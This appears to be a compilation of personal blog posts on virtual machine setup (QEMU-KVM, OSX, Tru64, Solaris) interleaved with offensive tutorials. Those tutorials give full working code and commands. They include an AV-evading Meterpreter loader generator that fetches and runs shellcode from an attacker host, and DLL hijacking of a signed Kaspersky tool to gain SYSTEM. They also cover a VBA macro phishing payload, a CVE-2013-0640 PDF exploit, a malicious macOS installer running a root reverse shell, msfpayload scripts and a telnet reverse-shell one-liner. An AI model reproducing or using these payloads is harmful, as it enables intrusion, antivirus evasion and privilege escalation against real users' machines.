It is always nice to have a possibility to run a virtual system to test various software designed for different platforms. Recently I have moved completely off from VirtualBox and started to use QEMU-KVM only. With GRSEC/PAX hardened kernel qemu-kvm works fine without any paxctl exceptions to its binaries or any modifications in the kernel config. I have managed to install and run iATKOS ML2 which is modified OSX 10.8.2 for PCs.  Maybe the following information might be handy to somebody wishing to virtualize 64bit OSX for testing.

My software specifications are as follows:

• OS: Debian stable 64bit  with vanilla kernel 2.6.50 & GRSEC/PAX patches and kvm_intel module
• QEMU-KVM  version 0.14.1 (Please check notes further on)
• iATKOS ML2 (no links here, please find your copy..)

I have had best success with qemu-kvm version 0.14.1 because of the RTL8139 network driver in this version. I had no luck in 1.2.x or 1.1.x to get the virtual network card to work  and earlier versions were also buggy, so stick to this one (works fine for Windows,Linux,OSX,BSDs…).

Another important thing is that any newer OSX system wont even boot on APIC IDs that are 11 or less. And QEMU-KVM 0.14.1 reports APIC=0×11. But no worries, it is open-source after-all and a simple patch can fix this which I will show further on. So what we need is to download a proper QEMU-KVM version from here:  sourceforge.net/projects/kvm/files/qemu-kvm/0.14.1/   or direct download sourceforge.net/projects/kvm/files/qemu-kvm/0.14.1/qemu-kvm-0.14.1.tar.gz/download

Extract the file and modify the hw/apic.c like this :

user@Obelix:~/qemu-kvm-0.14.1/hw/BACKUP$ diff patched.apic.c apic.c 
737c737
<         val = 0x14 | ((APIC_LVT_NB - 1) << 16); /* version 0x11 */
---
>         val = 0x11 | ((APIC_LVT_NB - 1) << 16); /* version 0x11 */

Just make sure you change the 0×11 to 0×14 on line 737. Now you can configure make and install the package.

Before booting make sure the kvm_intel kernel module is loaded (Im on an INTEL CPU, did not try AMD kvm_amd)

There are some parameters to be passed on to QEMU-KVM when booting OSX so here is a quick summary:

qemu-img create -f qcow2 lion.img 20G   (create an empty hdd for installation)

kvm -m 1400 -vga vmware lion.img  -cdrom /PATH/TO/ISO.iso -boot d -cpu core2duo -net nic,model=rtl8139,macaddr=10:1f:74:55:11:21 -net user -no-kvm-irqchip

Once you are in the iATKOS boot menu hit F8 and enter these boot parameters:

cpus=1 -v

We are just telling the bootloader to use 1 CPU and boot verbosely. You should boot to the setup menu where you create the OSX partition on the empty drive (use erase with label) and before hitting install select some custom options like PS/2 drivers (actually there are very few options to choose from in iATKOS ML2.

After installation you can boot OSX like so :

kvm -m 1400 -vga vmware lion.img  -cpu core2duo -net nic,model=rtl8139,macaddr=10:1f:74:55:11:21 -net user -no-kvm-irqchip

And dont forget to issue F8 cpus=1 boot flag

A note to myself,

always use virtio drivers for Windows guests in KVM-QEMU, it will improve disk IO greatly.
Here is a quick summary:

- Download ISO from here http://alt.fedoraproject.org/pub/alt/virtio-win/latest/images/
- For new Windows quest installation prepare the normal qcow2 image
- Boot the installation CD iso alongside the virtio CD iso like so:

kvm -vga vmware -m 1024 -drive file=windows7.qcow,cache=none,index=1,if=virtio -drive file=/PATH/TO/ISO/Win7.64.sp1.iso,index=2,media=cdrom -boot d -drive file=/PATH/TO/ISO/virtio-win-0.1-74.iso,index=3,media=cdrom

- In Windows setup choose to load custom disk drivers from the virtio cdrom
- Install / Reboot
- Boot Windows with following parameter :

 kvm -vga vmware -m 1024 -drive file=windows7.qcow,cache=none,index=1,if=virtio

For Existing qcow images with installed Windows system with IDE emulation:
- Boot normally + add virtio iso
- Install legacy hardware (Win7)
- Install driver from virtio cdrom
- Shutdown Windows
- Boot Windows with following parameter:

 kvm -vga vmware -m 1024 -drive file=windows7.qcow,cache=none,index=1,if=virtio

The IO performance is much better with the virtio drivers then the default IDE emulation.

Oh and also good luck and all the best in 0x7DE, we will all need it.

For the demonstration purposes lets presume the target is using Windows 8.1 64bit, MS Office 2010 + Outlook and some form of Antivirus protection – in this case Avast NOD32 ver.7

Metasploit tools folder has many useful programs and for this exercise I have chosen the exe2vba.rb script to encode our stealth executable payload as a VBA script

committer_count.rb    module_author.rb      pack_fastlib.sh
context               module_changelog.rb   pattern_create.rb
convert_31.rb         module_commits.rb     pattern_offset.rb
cpassword_decrypt.rb  module_count.rb       payload.exe
dev                   module_disclodate.rb  payload_lengths.rb
exe2vba.rb            module_license.rb     payload.txt
exe2vbs.rb            module_mixins.rb      pdf2xdp.rb
find_badchars.rb      module_payloads.rb    profile.sh
halflm_second.rb      module_ports.rb       psexec.rb
hmac_sha1_crack.rb    module_rank.rb        reg.rb
import_webscarab.rb   module_reference.rb   verify_datastore.rb
list_interfaces.rb    module_targets.rb     virustotal.rb
lm2ntcrack.rb         msf_irb_shell.rb      vxdigger.rb
memdump               msftidy.rb            vxencrypt.rb
metasm_shell.rb       nasm_shell.rb         vxmaster.rb
user@Obelix:~/stuff/metasploit/tools$

For the executable payload I have used the custom meterpreter loader, which gets by all AVs just fine – Custom Meterpreter Loader 

The script output is simple and straightforward. It creates a VB source code that needs to be placed as a macro into a MS Word document and saved within the document. The ASCII encoded executable along with the function header needs to be hidden somewhere in the text itself, best location is probably a few pages down at the end.  (This step should be done on a VM Windows system with MS Office)

Next I have configured a mail system on my host in order to send an email to the VM where the “user” sits. I have used the basic Debian setup :

• Postfix
• Courier-pop3d  (Maildir)

I had a default /var/mail/user Mailbox format so I had to change to Maildir in /home/user/Maildir . Postfix is configured to deliver mail locally only because we will connect with a mail client from the VM to the host POP3. Just a note, you need to add  ”home_mailbox = Maildir/” to /etc/postfix/main.cf  and create a Maildir structure in your home directory. Mailing system can be a little tricky to setup if you haven’t done this before. After everything is ready we can test/connect to our new mailbox from the VM Outlook. I dont use bridging in KVM-QEMU, so everything that runs on the host is accessible from the VM as  IP 10.0.2.2

Next we simulate a real life email message from our host. I have used ALPINE for terminal as it suits me best for what I need. As #root I mail to user@obelix (In the first part of the video there is a typo in the mail address : user@Oblelix) attach the evil document and send away.

On the host we are using Windows 8.1 64bit with Avast NOD32 7 and MS Office 201. In order for the macro to run, user needs to enable the button at the top of the document when opened from Outlook directly.  The payload does its stuff, bypasses AV and spawns a reverse shell on the host.

Here is the video summary of Wargames pt.1

A short summary of useful KVM-Qemu commands and tricks.

disk images in qcow2 format tend to grow after while if one installs more and more stuff in the VMs. In order to free up space and shrink the qcow2 images do the following:

qemu-img convert -c -O qcow2 image.img shrunk.image.img

Test the new image by booting it the usual way and afterwards delete the original.img

In order to better control what gets onto the images we can use an internal snapshot function like so:

qemu-img create -f qcow2 -b shrunk.image.img snapshot01.shrunk.image.img

This way you can create as many snapshots as you need. I usually create simple bash scripts to load each VM snapshots like this :

Snapshot01
kvm -m 1024 -vga std -drive file=snapshot01.shrunk.image.img,cache=none,if=virtio

Snapshot02
kvm -m 1024 -vga std -drive file=snapshot02.shrunk.image.img,cache=none,if=virtio

etc ...

In case you need to revert back, just delete the snapshot file and create a new one from the original shrunk.image.img

When running Windows guests it is essential to run SAMBA on the host server and dedicate some shared folder so that the guests can access. For guest *nix systems sshd on host is sufficient as most systems ship with scp. When none of these are available or the VM network does not work, you can still try and use raw disk image and use that to copy over files.

Here I will use an example of a small USB flash stick 2 GB.

Lets assume it is formatted with some universally accepted file system (FAT32)

dd if=/dev/sdb1 of=/path/to/kvm/images/disk.raw

once the raw fat32 partition from the USB disk is dumped we can mount it via loop interface locally and copy files to/from.

mount -o loop disk.raw /mnt/usb

When finished, unmount and attach to KVM qemu as secondary IDE/virtio drive

kvm -vga vmware -m 1024 -drive file=snapshot01.shrunk.image.img,cache=none,index=1,if=virtio -drive file=disk.raw,index=2 -boot c

In another example, let us focus on popular PDF documents. The exploit used in this demo was originally written by WebDEVil  and can be downloaded from here ExploitAdobeReader  This is nothing new, but it is a nice example to demonstrate how such an attack could be used in a real world scenario.

Affected versions of Acrobat Reader are :

* 11.0.1
* 11.0.0
* 10.1.5
* 10.1.4
* 10.1.3
* 10.1.2
* 10.1
* 9.5

In this example we will download 10.1.4 from OldApps.com and install it in a VM Windows 7 SP1 64bit.

Next we need to prepare the evil PDF document using the ruby script from the exploit link above. There is a pretty clear howto regarding the requirements so I will just repeat it here

* Run on Windows :-)
* Ruby 1.9.x (http://rubyforge.org/frs/download.php/76752/rubyinstaller-1.9.3-p385.exe)
* Gems: origami, metasm (In command prompt type, gem install metasm && gem install origami -v “=1.2.5″)

Once set, grab some sample PDF document and experiment. In the testing VM with Windows open cmd.exe and goto the working directory where the exploit script is and execute the following to generate the modified PDF

ruby xfa_MAGIC.rb -i sample.pdf -p payload.exe -o test.pdf

Payload.exe is of course our meterpreter listener generated via Custom Meterpreter Loader

Also note that the CVE-2013-0640/1 exploit PDF is flagged by most Antivirus vendors by now, but it is not a point now,because this is just a demo. For example F-Secure detects the PDF as Exploit.PDF-JS.OneOfChild.Gen

Here is a video summary of the whole process

dfdsf

This was actually discovered by a pure chance as I have wanted to try something with GCC and accidentally compiled a windows C source code as a dll using the -shared option in MinGW.

Here is another interesting example how to get pass antivirus without being detected. Again this is based on an older article (Customizing Custom Meterpreter Loader) and 95% of the code is from Raphael Mudges metasploit loader project located here.

OK, the source code for the generator is almost identical, with some minor differences in the build process

p.s Also a good hint to make your console application hidden from WinGUI add the -mwindows parameter to gcc, thus the application wont be visible when executed from Explorer for example. (no console window)

i586-mingw32msvc-gcc temp.c -o payload.exe -lws2_32 -mwindows

#!/bin/bash
clear
echo "****************************************************************"
echo "    Automatic C source code generator - FOR METASPLOIT          "
echo "           Based on rsmudge metasploit-loader                   "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port

echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo '    WSADATA    wsaData;' >> temp.c
echo '    WORD    wVersionRequested;' >> temp.c
echo '    wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo '    if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo '         printf("bad\n"); '>> temp.c
echo '         WSACleanup(); '>> temp.c
echo '        exit(1);'>> temp.c
echo '    }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo '    printf("r %s\n", error);'>> temp.c
echo '    closesocket(my_socket);'>> temp.c
echo '    WSACleanup();'>> temp.c
echo '    exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo '    int    tret   = 0;'>> temp.c
echo '    int    nret   = 0;'>>temp.c
echo '    void * startb = buffer;'>> temp.c
echo '    while (tret < len) {'>>temp.c
echo '        nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo '        startb += nret;'>> temp.c
echo '        tret   += nret;'>>temp.c
echo '         if (nret == SOCKET_ERROR)'>> temp.c
echo '            punt(my_socket, "no data");'>> temp.c
echo '    }'>>temp.c
echo '    return tret;'>> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo '    struct hostent *        target;' >> temp.c
echo '    struct sockaddr_in     sock;' >> temp.c
echo '    SOCKET             my_socket;'>>temp.c
echo '    my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo '     if (my_socket == INVALID_SOCKET)'>> temp.c
echo '        punt(my_socket, ".");'>>temp.c
echo '    target = gethostbyname(targetip);'>>temp.c
echo '    if (target == NULL)'>>temp.c
echo '        punt(my_socket, "..");'>>temp.c
echo '    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo '    sock.sin_family = AF_INET;'>> temp.c
echo '    sock.sin_port = htons(port);'>>temp.c
echo '    if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo '         punt(my_socket, "...");'>>temp.c
echo '    return my_socket;'>>temp.c
echo '}' >> temp.c
echo 'int main(int argc, char * argv[]) {' >> temp.c
echo '  FreeConsole();'>>temp.c
echo '    ULONG32 size;'>>temp.c
echo '    char * buffer;'>>temp.c
echo '    void (*function)();'>>temp.c
echo '    winsock_init();'>> temp.c
echo '    SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c
echo '    int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c
echo '    if (count != 4 || size <= 0)'>>temp.c
echo '        punt(my_socket, "error lenght\n");'>>temp.c
echo '    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c
echo '    if (buffer == NULL)'>>temp.c
echo '        punt(my_socket, "error in buf\n");'>>temp.c
echo '    buffer[0] = 0xBF;'>>temp.c
echo '    memcpy(buffer + 1, &my_socket, 4);'>>temp.c
echo '    count = recv_all(my_socket, buffer + 5, size);'>>temp.c
echo '    function = (void (*)())buffer;'>>temp.c
echo '    function();'>>temp.c
echo '    return 0;'>>temp.c
echo '}' >> temp.c
echo 'Compiling C code to Dll ..'
i586-mingw32msvc-gcc  temp.c -o payload.dll -lws2_32 -shared
strip payload.dll
ls -la payload.dll

As you can see, we are adding a simple -shared command to the mingw compiler and creating a Dll from the above C code. Of course one would say that this is no way of writing a dll and it wont work, but it does and I will show you just how..

So once the dll is in place, copy it over to your test machine (Windows 8.1 64bit) and load it, dont forget to load your Metasploit listener on your attacker box..

rundll32 payload.dll,main

And bingo, we have a reverse shell ! Currently no AV detects this.

So now its time to abuse some signed executables that dont check their dll paths correctly …. and are trusted by almost everything of course, so If the signed exe loads our dll ?

Today I will show you an interesting example how to search for vulnerable Dll functions that we can compile into our custom Meterpreter DLL loader and let a signed executable execute it.

I have taken the good old Kaspersky Removal tool called kavremover. This tool is perfect for this example. As a host system I have Windows 7 SP1 64bit. What we will need is the SysinternalsSuite toolkit, most importantly the Process Monitor (procmon.exe). So we start procmon.exe and create a filter rule for process name called kavremover.exe so we can select only this process for analysis. Next we load kavremover.exe and search for vulnerable DLL paths. After a while I came across the following DLL that gets searched first in the execution path i.e in the root folder where the kavremover.exe is executed. (In our case it is the users desktop)

So we then search all the dlls for some interesting function that gets loaded from msi.dll and I have found an interesting list here:

There are two functions in msi.dll called GetInfo and MsiGetProductInfoA. So lets try and modify our meterpreter dll file a little and change the main() function to either GetInfo or MsiGetProductInfoA.

The generator from my previous post generates a binary and c source file called temp.c. After setting the Metasploit server IP and port number, open the temp.c and modify the function main() to something like this:

int MsiGetProductInfoA(int argc, char * argv[]) {
  FreeConsole();
    ULONG32 size;
    char * buffer;
    void (*function)();
    winsock_init();
    SOCKET my_socket = wsconnect(server, atoi(serverp));
    int count = recv(my_socket, (char *)&size, 4, 0);
    if (count != 4 || size <= 0)
        punt(my_socket, "error lenght\n");
    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        punt(my_socket, "error in buf\n");
    buffer[0] = 0xBF;
    memcpy(buffer + 1, &my_socket, 4);
    count = recv_all(my_socket, buffer + 5, size);
    function = (void (*)())buffer;
    function();
    return 0;
}

Please note that if you use int GetInfo() the kavremover.exe will crash and we wont get a reverse shell, so use  MsiGetProductInfoA, this works just fine although the whole program wont load properly of course, but it gets the job done. Once modified, compile the temp.c

i586-mingw32msvc-gcc  temp.c -o payload.dll -lws2_32 -shared
strip payload.dll
mv payload.dll msi.dll

Next we can upload the final msi.dll to the virtual testing system where the kavremover.exe is waiting. Start your favorite reverse shell payload via Metasploit and wait for the shell to pop up once we execute kavremover.exe

kavremover.exe is digitally signed so in many cases our dll will get loaded just fine, thus bypassing many sandbox techniques (like Comodo AV ) and allowing us to elevate to NT AUTHORITY/SYSTEM

Here is a short video of the whole process

Also here is a short video demonstrating the attack against fully updated Windows 8.1 64bit with active Windows Defender (kinda lame but nevertheless)…

And now to think what could possibly go wrong ….. (Win 8.1 64bit + Comodo AV Advanced 6)

In the previous articles I was describing how to install and run 64bit OSX in KVM (in this example it is Mountain Lion 10.8.2), now lest focus on some simple exercise in creating an installer via Iceberg which would contain a meterpreter payload and will get executed once installed on the host. Also I have installed an antivirus for OSX. According to some online review there are a few products that boast high ratings, one of them being Trend Micro Titanium. Also note that I have no firewall setup on the OSX.

There is a previous article describing a very similar approach for an old 32bit 10.6.x OSX  here : http://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit

In this test I have installed Trend Micro Titanium on OSX 10.8.2 and prepared an installer containing Java meterpreter payload. Here is a simple shell script to make things easier:

clear  
echo "************************************************************"
echo "   Automatic  Java Meterpreter generator - FOR METASPLOIT   "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar  
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

So next lets copy over the test.jar to the virtualized osx and load Iceberg. There is a video demonstration at the end that describes the whole process. Setting up Iceberg is very easy, just make sure you have the jar meterpreter file handy and the loader script which should be as follows:

#!/bin/sh
/usr/bin/java -jar /Applications/Utilities/test.jar

I have chosen the application path /Applications/Utilities/ for the jar file to be installed in and a postupgrade or postinstall script that will load the test.jar file while the installer runs. Also While creating the Iceberg installer make sure that the “Requres Admin” is checked otherwise you wont get root privileges.  Here are some screenshots :

Once you compile the project the installer located in /Users/user/Test (or whatever you have called the project) can be executed. Also I have created as simple shell script for the Metasploit listener for the shell:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "      starting the meterpreter listener.."
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp LHOST=$127.0.0.1 LPORT=$port  E

So once we execute the pkg installer a root meterpreter shell pops up. Trend Micro Titanium seems to be happy with it.

So the Java meterpreter payload works well, how about native reverse tcp shell payloads for 64bit OSX ? They dont work as I believe there is some memory execute prevention in the kernel. I have tested it here with the following C source generator:

clear  
echo "************************************************************"
echo "    Automatic  shellcode generator - FOR METASPLOIT         "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo -e "What IP are we gonna use ?  \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
mkdir ShellCode
./msfpayload   osx/x64/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x64/xor  > test.c
mv test.c ShellCode
cd ShellCode
#Replacing plus signs at the end of line
sed -e 's/+/ /g' test.c > clean.c
sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
echo "#include <stdio.h>" >> temp.c 
cat ready.c >> temp.c 
echo ";" >> temp.c
echo "int main(void) { ((void (*)())micro)();" >> temp.c 
echo "}" >> temp.c  
mv temp.c final.c
echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
#Cleanup
rm -f clean.c
rm -f test.c
rm -f ready.c
rm -f rand.c
rm -f temp2
rm -f temp3
rm -f temp4 
cd ..

Once we copy over the final.c to OSX we can compile it via GCC and execute, but all I get is a bus error:

So we are pretty much stuck with the Java meterpreter payload for 64bit OSX systems.

Interesting Trend Micro Titanium processes on the OSX:

ps aux | grep Trend
user             280   0.4  1.3   713228  26736   ??  Ss    9:19AM   0:20.30 /Applications/TrendMicro.localized/iTIS.app/Contents/MacOS/iTIS -update
root             364   0.0  2.2   652028  45640   ??  Ss    9:20AM   0:21.90 /Library/Application Support/TrendMicro/TmccMac/iCoreService_av -p 61301 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmAntiMalware.dylib
user             196   0.0  0.5   690412  10752   ??  S     9:13AM   0:01.49 /Library/Application Support/TrendMicro/TmccMac/UIMgmt.app/Contents/MacOS/UIMgmt
root              62   0.0  0.2   617688   3472   ??  Ss    9:11AM   0:06.00 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61100 -n 61100 /Library/Application Support/TrendMicro/common/lib/libnamingService.dylib /Library/Application Support/TrendMicro/common/lib/libtaskManager.dylib /Library/Application Support/TrendMicro/common/lib/libnotificationService.dylib /Library/Application Support/TrendMicro/common/lib/libTmUpdate.dylib /Library/Application Support/TrendMicro/common/lib/libTmDb.dylib
root              61   0.0  0.2   617520   3912   ??  Ss    9:11AM   0:00.31 /Library/Application Support/TrendMicro/TmccMac/iCoreService_wp -p 61201 -n 61100 /Library/Application Support/TrendMicro/common/lib/libTmProxy.dylib
root              59   0.0  0.2   628928   4128   ??  Ss    9:11AM   0:00.65 /Library/Application Support/TrendMicro/TmccMac/iCoreService -p 61401 -n 61100 /Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/iTISPlugin
root             481   0.0  0.0  2433436      0   ??  R     9:41AM   0:00.00 grep Trend

And here is the whole process summary in a short video:

With Virtual technology nowadays it is possible to emulate almost anything, and for those that wish to play around with not-so-common operation systems for the Alpha processor family there exists a great software called EmuVM, which is available for free for either Windows or Linux here emuvm.com/downloads.php

This emulator is capable of emulation a various number of Alpha servers and is probably the best choice for a modern 64bit linux system. I have made all tests on Debian 64bit with GRSEC patched kernel 3.6.55.  There is very little information about Tru64 UNIX regarding installing and running inside a VM so I have decided to update this gap with some of my findings. Also I will show you how to perform some simple Metasploit operations against the Tru64 system.

So the first thing is probably obtaining a copy of the EmuVM software from the above link, I have used the stable version alphavm-free-1-3-9.tgz. Once unpacked there are 2 important files, the alphavm binary and the configuration file. I will post my configuration file that I have used to install Tru64 5.1B which emulates the AlphaServer DS10 616 MhZ

Here is the example config.emu for the above model

 system {
 type = ds10_616;
 reported_type = default;
 num_cpus = 1;
 ssn = 'EmuVM-00-000-001';
 interval_clock_freq = 1000;
memory {
 size = 512;
}
cpu {
 server = basic;
jit {
 async = yes;
}
}
serial com1 {
 server = socket;
 port = 3000;
}
serial com2 {
 server = socket;
 port = 3001;
}
scsi_controller qla0 {
 scsi_id = 7;
}
scsi_controller qla1 {
 scsi_id = 7;
}
scsi_disk dka0 {
 scsi_bus = 0;
 scsi_id = 0;
 scsi_lun = 0;
 file = 'disk.dd';
 caching = no;
 write_through = yes;
}
scsi_cdrom iso {
 scsi_id = 4;
 file = 'Tru64.iso';
}
ether eth0 {
 type = dec21040;
 server = dummy;
 mac_address = 0x08002B000001;
}
ether eth1 {
 type = dec21040;
 server = tap;
 interface = 'tap0';
 mac_address = 0x08002B000002;
}

}

The important parts in this config file are the virtual disk location and the network card settings. I have kept all the files in the root folder where the alphavm binary resides.  In order for us to install Tru64 onto a harddisk we need to prepare a file that will hold the system on our host. (2 Gigs is enough)

dd if=/dev/zero of=disk.dd bs=1024 count=2M

Once we have this, next step is getting the installation media for the actual Tru64 System. If you have the CDs you can just dd them into an ISO, if not, have a look on the PirateBay, there is a torrent that has the :

-rw-r--r-- 1 user user 443 Feb 8 10:00 README.txt
-rw-r--r-- 1 user user 216601968 Feb 8 10:00 T64V51BB27AS0006_install.iso.bz2
-rw-r--r-- 1 user user 427318884 Feb 8 10:00 Tru64_5.1B_GNU_VOL1.img.bz2
-rw-r--r-- 1 user user 531119101 Feb 8 10:00 Tru64_5.1B_PORT_VOL1.img.bz2
-rw-r--r-- 1 user user 429326071 Feb 8 10:00 V5.1Br2650_A1.iso.bz2
-rw-r--r-- 1 user user 343522410 Feb 8 10:00 V5.1Br2650_A2.iso.bz2
-rw-r--r-- 1 user user 383672280 Feb 8 10:00 V5.1Br2650_O1.iso.bz2

You really only need the install ISO V5.1Br2650_O1.iso.bz2  and the PATCH ISO T64V51BB27AS0006_install.iso.bz2

So once you have the ISO and HDD file in place, boot the VM like so :

./alphavm_free config.emu

And connect to the VM machine via socat like so:

socat -,raw,echo=0,escape=0x1c tcp:127.0.0.1:3000

Of course you can use other programs to connect like telnet or putty but there are problems with escape sequences in the terminal emulation, best results for me are with socat.

user@Obelix:~/KVM/Alpha/Tru64$ ./connect.console.sh 
 Welcome to EmuVM hardware emulator.
 Copyright 2010 - 2012, Artem Alimarin. All rights reserved.
 Please visit http://emuvm.com for more information.
show devices
pka SCSI Controller
dka0 SCSI 0 14 0 0 0 0 0
dka400 SCSI 0 14 0 0 400 0 0
pkb SCSI Controller
ewa MOP 0 9 0 0 0 3 0 (08:00:2b:00:00:01)
ewb MOP 0 11 0 0 0 3 0 (08:00:2b:00:00:02)
>>>

So we first need to boot the CD in order to install Tru64, this has to be done by telling which SCSI device to boot from, in our case it is dka400 (CDROM) while the dka0 is the HDD.

boot dka400

The ISO boots into a single user mode from which we can perform the actual installation. Anybody with some background with Linux/BSD/Unix can setup the system, it is not difficult and I am not going to cover this here, simply experiment or use default values during the installer process. Once finished you can apply the 5.1B patches from the other ISO to the current system but it is not necessary (must be installed from the Tru64 as the patch CD is not bootable)

Once finished boot the HDD via :

boot dka0

The most important thing is setting up the network on the host and the guest. First I will show and example how to configure this via a simple shellscript that configures the tap0 and bridge interfaces. In my scenario I use a laptop with 2 network cards, one is wlan0 (wireless) other is eth0 (Ethernet). I have decided to use the Ethernet interface for interacting with the guest VM and wireless for internet connection. So here is the script that sets up the necessary stuff:

tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 eth0
brctl setfd br0 0
ifconfig eth0 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
route add -net 0.0.0.0/0 gw 10.0.2.1
brctl addif br0 tap0
ifconfig tap0 0.0.0.0

Explanation: I setup my eth0 as 10.0.2.1 and the Tru64 VM as 10.2.10 so the VM and HOST can communicate on this sub-net. Wireless is on another sub-net, but I don’t plan to connect the VM to the internet. So before starting the AlphaVM run this script first to get the network working. I have used a second virtual interface in the config.emu

ether eth1 {
 type = dec21040; 
 server = tap;
 interface = 'tap0'; 
 mac_address = 0x08002B000002;
}

The first one is just a dummy the second one using tap0 interface, make sure you don’t have the same MAC address as the tap0 device.

On the Tru64 system I have a fixed IP address for the tu1 interface like so:

tu1: flags=c63<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST,SIMPLEX>
 inet 10.0.2.10 netmask ffffff00 broadcast 10.0.2.255 ipmtu 1500

So now lets see how we can perform a first test on the Virtual Tru64. Lets see if we can get a reverse shell. As there is very limited info about Alpha shellcode :) we are probably stuck in using something inbuilt, like telnet or perl. Telnet reverse shell works fine. You can try running a Metasploit listerner on the host via this script:

 #!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=cmd/unix/reverse LHOST=10.0.2.1 LPORT=$port E

And run the following command on the target Tru64 system:

sh -c '(sleep 4074|telnet 10.0.2.1 8000|while : ; do sh && break; done 2>&1|telnet 10.0.2.1 8000 >/dev/null 2>&1 &)'

It works well, and for our educational purposes this servers as a good example. I believe there is a book out there called ShellCoders HandBook that covers Tru64 security in one dedicated chapter. The examples there can be verified using this VM setup and one can gain some knowledge of Tru64 Unix.

Here is a little video demonstration of the above Metasploit test against Tru64

Ok, so we have the Tru64 up and running inside the alphavm and now we want to have a fancy X11 desktop with CDE window manager. Here is a quick howto for setting up vncserver and CDE on the Tru64. You will need the GNU application CD with a label “OSSC V5.1B RPM Installation Disc” which contains all the necessary files.

So first attach the ISO to the config.emu file :

scsi_cdrom iso {
 scsi_id = 4;
 file = 'gnu.tru64.iso';
}

After we boot the system, mount the CDROM under /mnt !

# mount /dev/disk/cdrom0a /mnt

then go to the SETUP folder and run the RPM-init.ksh shellscript:

cd /mnt/SETUP
./RPM-init.ksh

Then you can install the VNC rpm package for the Alpha processor :

cd /mnt/RPMS/
/usr/local/bin/rpm -i vnc-3.3.3-2.alpha.rpm

Once installed, copy over the following files from /usr/local/bin to /usr/bin/X11

cp /usr/local/bin/Xvnc /usr/bin/X11
cp /usr/local/bin/vncpasswd /usr/bin/X11
cp /usr/local/bin/vncserver /usr/bin/X11

This step is important otherwise the vncserver binary wont run and you will have to figure out how to setup $PATHS for the user on Tru64

Once you have the files copied you can start the vncserver, I have stated mine from / and it created a hidden directory .vnc in the root folder. The .vnc contains the xsrtartup file, which we need to modify in order to use the CDE window manager so it contains only this:

/usr/dt/bin/Xsession &

OK we are done now, and you can connect via VNC client from your host via its virtual IP address (in my example tap0  0.0.0.0  br0 10.0.2.2  and Tru64 tu1 10.0.2.10 gw 10.0.2.2)

xvncviewer 10.0.2.10:1

Here is the result

Just to follow up on the different OS scenarios from the previous posts, here is a test done on Solaris 11.1 x86 in Qemu KVM. Setup is nothing special, standard way of creating hdd qcow2 image, and launching the VM. Here is my script that does that:

 kvm -m 1024 -vga vmware -drive file=hdd.img,cache=none,index=1 -net nic,model=rtl8139,macaddr=10:1f:74:56:47:58 -net user

Once the system is up, setup a meterpreter java listener on the host and generate a java payload for the Solaris guest. I have used the same scripts like for OSX because of the meterpreter Java

clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
./msfpayload java/meterpreter/reverse_tcp LHOST=$IP LPORT=$port EXITFUNC=thread R > test.jar
mkdir ShellCode
mv test.jar ShellCode
echo "test.jar generated in ShellCode folder..."

The listener is identical:

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo "***************************************************************"
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo " starting the meterpreter listener.."
./msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=$port E

